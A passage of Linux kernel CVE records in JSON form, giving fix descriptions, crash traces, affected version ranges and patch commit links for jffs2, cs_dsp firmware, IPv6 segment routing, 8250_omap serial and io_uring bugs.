"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njffs2: Fix potential illegal address access in jffs2_free_inode\n\nDuring the stress testing of the jffs2 file system,the following\nabnormal printouts were found:\n[ 2430.649000] Unable to handle kernel paging request at virtual address 0069696969696948\n[ 2430.649622] Mem abort info:\n[ 2430.649829] ESR = 0x96000004\n[ 2430.650115] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 2430.650564] SET = 0, FnV = 0\n[ 2430.650795] EA = 0, S1PTW = 0\n[ 2430.651032] FSC = 0x04: level 0 translation fault\n[ 2430.651446] Data abort info:\n[ 2430.651683] ISV = 0, ISS = 0x00000004\n[ 2430.652001] CM = 0, WnR = 0\n[ 2430.652558] [0069696969696948] address between user and kernel address ranges\n[ 2430.653265] Internal error: Oops: 96000004 [#1] PREEMPT SMP\n[ 2430.654512] CPU: 2 PID: 20919 Comm: cat Not tainted 5.15.25-g512f31242bf6 #33\n[ 2430.655008] Hardware name: linux,dummy-virt (DT)\n[ 2430.655517] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 2430.656142] pc : kfree+0x78/0x348\n[ 2430.656630] lr : jffs2_free_inode+0x24/0x48\n[ 2430.657051] sp : ffff800009eebd10\n[ 2430.657355] x29: ffff800009eebd10 x28: 0000000000000001 x27: 0000000000000000\n[ 2430.658327] x26: ffff000038f09d80 x25: 0080000000000000 x24: ffff800009d38000\n[ 2430.658919] x23: 5a5a5a5a5a5a5a5a x22: ffff000038f09d80 x21: ffff8000084f0d14\n[ 2430.659434] x20: ffff0000bf9a6ac0 x19: 0169696969696940 x18: 0000000000000000\n[ 2430.659969] x17: ffff8000b6506000 x16: ffff800009eec000 x15: 0000000000004000\n[ 2430.660637] x14: 0000000000000000 x13: 00000001000820a1 x12: 00000000000d1b19\n[ 2430.661345] x11: 0004000800000000 x10: 0000000000000001 x9 : ffff8000084f0d14\n[ 2430.662025] x8 : ffff0000bf9a6b40 x7 : ffff0000bf9a6b48 x6 : 0000000003470302\n[ 2430.662695] x5 : ffff00002e41dcc0 x4 : ffff0000bf9aa3b0 x3 : 0000000003470342\n[ 2430.663486] x2 : 0000000000000000 x1 : ffff8000084f0d14 x0 : fffffc0000000000\n[ 2430.664217] Call trace:\n[ 2430.664528] kfree+0x78/0x348\n[ 2430.664855] jffs2_free_inode+0x24/0x48\n[ 2430.665233] i_callback+0x24/0x50\n[ 2430.665528] rcu_do_batch+0x1ac/0x448\n[ 2430.665892] rcu_core+0x28c/0x3c8\n[ 2430.666151] rcu_core_si+0x18/0x28\n[ 2430.666473] __do_softirq+0x138/0x3cc\n[ 2430.666781] irq_exit+0xf0/0x110\n[ 2430.667065] handle_domain_irq+0x6c/0x98\n[ 2430.667447] gic_handle_irq+0xac/0xe8\n[ 2430.667739] call_on_irq_stack+0x28/0x54\nThe parameter passed to kfree was 5a5a5a5a, which corresponds to the target field of\nthe jffs_inode_info structure. It was found that all variables in the jffs_inode_info\nstructure were 5a5a5a5a, except for the first member sem. It is suspected that these\nvariables are not initialized because they were set to 5a5a5a5a during memory testing,\nwhich is meant to detect uninitialized memory.The sem variable is initialized in the\nfunction jffs2_i_init_once, while other members are initialized in\nthe function jffs2_init_inode_info.\n\nThe function jffs2_init_inode_info is called after iget_locked,\nbut in the iget_locked function, the destroy_inode process is triggered,\nwhich releases the inode and consequently, the target member of the inode\nis not initialized.In concurrent high pressure scenarios, iget_locked\nmay enter the destroy_inode branch as described in the code.\n\nSince the destroy_inode functionality of jffs2 only releases the target,\nthe fix method is to set target to NULL in jffs2_i_init_once."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:20.374Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b6c8b3e31eb88c85094d848a0bd8b4bafe67e4d8"
},
{
"url": "https://git.kernel.org/stable/c/0b3246052e01e61a55bb3a15b76acb006759fe67"
},
{
"url": "https://git.kernel.org/stable/c/6d6d94287f6365282bbf41e9a5b5281985970789"
},
{
"url": "https://git.kernel.org/stable/c/5ca26334fc8a3711fed14db7f9eb1c621be4df65"
},
{
"url": "https://git.kernel.org/stable/c/751987a5d8ead0cc405fad96e83ebbaa51c82dbc"
},
{
"url": "https://git.kernel.org/stable/c/d0bbbf31462a400bef4df33e22de91864f475455"
},
{
"url": "https://git.kernel.org/stable/c/05fc1ef892f862c1197b11b288bc00f602d2df0c"
},
{
"url": "https://git.kernel.org/stable/c/af9a8730ddb6a4b2edd779ccc0aceb994d616830"
}
],
"title": "jffs2: Fix potential illegal address access in jffs2_free_inode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42115",
"datePublished": "2024-07-30T07:46:08.276Z",
"dateReserved": "2024-07-29T15:50:41.178Z",
"dateUpdated": "2025-05-04T09:23:20.374Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42238 (GCVE-0-2024-42238)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: cs_dsp: Return error if block header overflows file
Return an error from cs_dsp_power_up() if a block header is longer
than the amount of data left in the file.
The previous code in cs_dsp_load() and cs_dsp_load_coeff() would loop
while there was enough data left in the file for a valid region. This
protected against overrunning the end of the file data, but it didn't
abort the file processing with an error.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42238",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:57.707205Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.911Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b8be70566b33abbd0180105070b4c67cfef8c44f",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "90ab191b7d181057d71234e8632e06b5844ac38e",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "6eabd23383805725eff416c203688b7a390d4153",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "959fe01e85b7241e3ec305d657febbe82da16a02",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Return error if block header overflows file\n\nReturn an error from cs_dsp_power_up() if a block header is longer\nthan the amount of data left in the file.\n\nThe previous code in cs_dsp_load() and cs_dsp_load_coeff() would loop\nwhile there was enough data left in the file for a valid region. This\nprotected against overrunning the end of the file data, but it didn\u0027t\nabort the file processing with an error."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:49.417Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b8be70566b33abbd0180105070b4c67cfef8c44f"
},
{
"url": "https://git.kernel.org/stable/c/90ab191b7d181057d71234e8632e06b5844ac38e"
},
{
"url": "https://git.kernel.org/stable/c/6eabd23383805725eff416c203688b7a390d4153"
},
{
"url": "https://git.kernel.org/stable/c/959fe01e85b7241e3ec305d657febbe82da16a02"
}
],
"title": "firmware: cs_dsp: Return error if block header overflows file",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42238",
"datePublished": "2024-08-07T15:14:26.812Z",
"dateReserved": "2024-07-30T07:40:12.253Z",
"dateUpdated": "2025-05-04T09:24:49.417Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26735 (GCVE-0-2024-26735)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: fix possible use-after-free and null-ptr-deref
The pernet operations structure for the subsystem must be registered
before registering the generic netlink family.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa Version: 915d7e5e5930b4f01d0971d93b9b25ed17d221aa |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26735",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T14:17:44.078376Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-27T20:01:54.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-11-01T17:03:12.597Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/953f42934533c151f440cd32390044d2396b87aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82831e3ff76ef09fb184eb93b79a3eb3fb284f1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65c38f23d10ff79feea1e5d50b76dc7af383c1e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91b020aaa1e59bfb669d34c968e3db3d5416bcee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8391b9b651cfdf80ab0f1dc4a489f9d67386e197"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9e02973dbc6a91e40aa4f5d87b8c47446fbfce44"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02b08db594e8218cfbc0e4680d4331b457968a9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5559cea2d5aa3018a5f00dd2aca3427ba09b386b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241101-0012/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "953f42934533c151f440cd32390044d2396b87aa",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "82831e3ff76ef09fb184eb93b79a3eb3fb284f1d",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "65c38f23d10ff79feea1e5d50b76dc7af383c1e6",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "91b020aaa1e59bfb669d34c968e3db3d5416bcee",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "8391b9b651cfdf80ab0f1dc4a489f9d67386e197",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "9e02973dbc6a91e40aa4f5d87b8c47446fbfce44",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "02b08db594e8218cfbc0e4680d4331b457968a9b",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "5559cea2d5aa3018a5f00dd2aca3427ba09b386b",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix possible use-after-free and null-ptr-deref\n\nThe pernet operations structure for the subsystem must be registered\nbefore registering the generic netlink family."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:13.758Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/953f42934533c151f440cd32390044d2396b87aa"
},
{
"url": "https://git.kernel.org/stable/c/82831e3ff76ef09fb184eb93b79a3eb3fb284f1d"
},
{
"url": "https://git.kernel.org/stable/c/65c38f23d10ff79feea1e5d50b76dc7af383c1e6"
},
{
"url": "https://git.kernel.org/stable/c/91b020aaa1e59bfb669d34c968e3db3d5416bcee"
},
{
"url": "https://git.kernel.org/stable/c/8391b9b651cfdf80ab0f1dc4a489f9d67386e197"
},
{
"url": "https://git.kernel.org/stable/c/9e02973dbc6a91e40aa4f5d87b8c47446fbfce44"
},
{
"url": "https://git.kernel.org/stable/c/02b08db594e8218cfbc0e4680d4331b457968a9b"
},
{
"url": "https://git.kernel.org/stable/c/5559cea2d5aa3018a5f00dd2aca3427ba09b386b"
}
],
"title": "ipv6: sr: fix possible use-after-free and null-ptr-deref",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26735",
"datePublished": "2024-04-03T17:00:21.972Z",
"dateReserved": "2024-02-19T14:20:24.165Z",
"dateUpdated": "2025-05-04T08:55:13.758Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42095 (GCVE-0-2024-42095)
Vulnerability from cvelistv5
Published
2024-07-29 17:39
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: 8250_omap: Implementation of Errata i2310
As per Errata i2310[0], Erroneous timeout can be triggered,
if this Erroneous interrupt is not cleared then it may leads
to storm of interrupts, therefore apply Errata i2310 solution.
[0] https://www.ti.com/lit/pdf/sprz536 page 23
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9443acbd251f366804b20a27be72ba67df532cb1 Version: b67e830d38fa9335d927fe67e812e3ed81b4689c Version: b67e830d38fa9335d927fe67e812e3ed81b4689c Version: b67e830d38fa9335d927fe67e812e3ed81b4689c Version: b67e830d38fa9335d927fe67e812e3ed81b4689c Version: b67e830d38fa9335d927fe67e812e3ed81b4689c Version: bf1bcca53c35a40976afbdd40aaea9424154f57b Version: ed87ec89b7f6071de06380a0216e6aa420eb9742 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.163Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42095",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:24.897254Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:00.606Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/8250/8250_omap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cb879300669881970eabebe64bd509dbbe42b9de",
"status": "affected",
"version": "9443acbd251f366804b20a27be72ba67df532cb1",
"versionType": "git"
},
{
"lessThan": "87257a28271c828a98f762bf2dd803c1793d2b5b",
"status": "affected",
"version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
"versionType": "git"
},
{
"lessThan": "98840e410d53329f5331ecdce095e740791963d0",
"status": "affected",
"version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
"versionType": "git"
},
{
"lessThan": "e67d7f38008e56fb691b6a72cadf16c107c2f48b",
"status": "affected",
"version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
"versionType": "git"
},
{
"lessThan": "6270051f656004ca5cde644c73cb1fa4d718792e",
"status": "affected",
"version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
"versionType": "git"
},
{
"lessThan": "9d141c1e615795eeb93cd35501ad144ee997a826",
"status": "affected",
"version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
"versionType": "git"
},
{
"status": "affected",
"version": "bf1bcca53c35a40976afbdd40aaea9424154f57b",
"versionType": "git"
},
{
"status": "affected",
"version": "ed87ec89b7f6071de06380a0216e6aa420eb9742",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/8250/8250_omap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "5.10.50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.12.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250_omap: Implementation of Errata i2310\n\nAs per Errata i2310[0], Erroneous timeout can be triggered,\nif this Erroneous interrupt is not cleared then it may leads\nto storm of interrupts, therefore apply Errata i2310 solution.\n\n[0] https://www.ti.com/lit/pdf/sprz536 page 23"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:35.598Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
},
{
"url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
},
{
"url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
},
{
"url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
},
{
"url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
},
{
"url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
}
],
"title": "serial: 8250_omap: Implementation of Errata i2310",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42095",
"datePublished": "2024-07-29T17:39:30.948Z",
"dateReserved": "2024-07-29T15:50:41.173Z",
"dateUpdated": "2025-05-04T12:57:35.598Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48937 (GCVE-0-2022-48937)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
io_uring: add a schedule point in io_add_buffers()
Looping ~65535 times doing kmalloc() calls can trigger soft lockups,
especially with DEBUG features (like KASAN).
[ 253.536212] watchdog: BUG: soft lockup - CPU#64 stuck for 26s! [b219417889:12575]
[ 253.544433] Modules linked in: vfat fat i2c_mux_pca954x i2c_mux spidev cdc_acm xhci_pci xhci_hcd sha3_generic gq(O)
[ 253.544451] CPU: 64 PID: 12575 Comm: b219417889 Tainted: G S O 5.17.0-smp-DEV #801
[ 253.544457] RIP: 0010:kernel_text_address (./include/asm-generic/sections.h:192 ./include/linux/kallsyms.h:29 kernel/extable.c:67 kernel/extable.c:98)
[ 253.544464] Code: 0f 93 c0 48 c7 c1 e0 63 d7 a4 48 39 cb 0f 92 c1 20 c1 0f b6 c1 5b 5d c3 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 53 48 89 fb <48> c7 c0 00 00 80 a0 41 be 01 00 00 00 48 39 c7 72 0c 48 c7 c0 40
[ 253.544468] RSP: 0018:ffff8882d8baf4c0 EFLAGS: 00000246
